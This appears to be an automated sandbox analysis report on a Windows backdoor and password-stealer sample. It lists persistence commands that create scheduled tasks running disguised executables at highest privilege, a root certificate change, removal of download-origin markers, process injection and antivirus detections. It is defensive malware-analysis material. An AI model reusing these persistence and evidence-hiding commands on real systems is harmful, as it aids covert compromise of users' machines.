cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Cursors\WmiPrvSE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office.en-us\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\util\ProcessMonitor\explorer.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Windows\System32\ntshrui\SearchIndexer.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\System32\C_20932\wininit.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Windows\SysWOW64\wscript\srvany.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PerfLogs\Admin\WmiPrvSE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\WMIPICMP\WmiPrvSE.exe'" /rl HIGHEST /f

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob

Attempts to remove evidence of file being downloaded from the Internet (13 events)

file	C:\ProgramData\Templates\smss.exe:Zone.Identifier
file	C:\Windows\System32\ntshrui\SearchIndexer.exe:Zone.Identifier
file	C:\PerfLogs\Admin\WmiPrvSE.exe:Zone.Identifier
file	C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\winlogon.exe:Zone.Identifier
file	C:\Windows\System32\C_500\taskhost.exe:Zone.Identifier
file	C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office.en-us\pw.exe:Zone.Identifier
file	C:\util\ProcessMonitor\explorer.exe:Zone.Identifier
file	C:\Windows\System32\wbem\WMIPICMP\WmiPrvSE.exe:Zone.Identifier
file	C:\Windows\System32\C_20932\wininit.exe:Zone.Identifier
file	C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C)\fontWinRuntimecrtNetrefruntimedll.exe:Zone.Identifier
file	C:\Documents and Settings\audiodg.exe:Zone.Identifier
file	C:\Windows\Cursors\WmiPrvSE.exe:Zone.Identifier
file	C:\Windows\SysWOW64\wscript\srvany.exe:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1768 resumed a thread in remote process 2680
NtResumeThread Aug. 2, 2021, 5:45 p.m.	thread_handle: 0x0000000000000068 suspend_count: 0 process_identifier: 2680	1	0	0

File has been identified by 50 AntiVirus engines on VirusTotal as malicious (50 events)

Lionic	Trojan.MSIL.LightStone.m!c
Elastic	malicious (high confidence)
DrWeb	BackDoor.QuasarNET.3
MicroWorld-eScan	Trojan.MSIL.Basic.8.Gen
FireEye	Generic.mg.2ee557a2195e4106
CAT-QuickHeal	Trojan.YakbeexMSIL.ZZ4
McAfee	GenericRXPF-LQ!2EE557A2195E
Malwarebytes	Trojan.PasswordStealer
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Spyware ( 004bf6371 )
Alibaba	Backdoor:Win32/LightStone.c7ded26e
K7GW	Spyware ( 004bf6371 )
Cybereason	malicious.2195e4
BitDefenderTheta	Gen:NN.ZemsilF.34050.Lm0@au8YJ6ji
Cyren	W32/MSIL_Troj.BGI.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Spy.Agent.AES
APEX	Malicious
Paloalto	generic.ml
ClamAV	Win.Packed.Uztuby-9853721-0
Kaspersky	HEUR:Backdoor.MSIL.LightStone.gen
BitDefender	Trojan.MSIL.Basic.8.Gen
Avast	Win32:KeyloggerX-gen [Trj]
Ad-Aware	Trojan.MSIL.Basic.8.Gen
Emsisoft	Trojan.MSIL.Basic.8.Gen (B)
TrendMicro	TROJ_GEN.R06CC0DGR21
McAfee-GW-Edition	GenericRXPF-LQ!2EE557A2195E
Sophos	Mal/SpyNoon-A
SentinelOne	Static AI - Malicious PE
Jiangmin	Backdoor.MSIL.eunv
MaxSecure	Trojan.Malware.74703599.susgen
Avira	TR/Spy.Agent.tcyin
MAX	malware (ai score=83)
Microsoft	Trojan:Win32/Spy.BYF!MTB
Gridinsoft	Spy.Win32.Agent.dd!n
Arcabit	Trojan.MSIL.Basic.8.Gen
GData	Trojan.MSIL.Basic.8.Gen
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Spy.C4556236
VBA32	TScope.Trojan.MSIL
ALYac	Trojan.MSIL.Basic.8.Gen
Cylance	Unsafe
TrendMicro-HouseCall	TROJ_GEN.R06CC0DGR21
Ikarus	Win32.Outbreak
eGambit	Unsafe.AI_Score_94%
Fortinet	MSIL/Agent.BYF!tr.spy
AVG	Win32:KeyloggerX-gen [Trj]
Panda	Trj/GdSda.A
CrowdStrike	win/malicious_confidence_100% (W)
Qihoo-360	Win32/Backdoor.LightStone.HwMA3wcA

fontWinRuntimecrtNetrefruntimedll.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All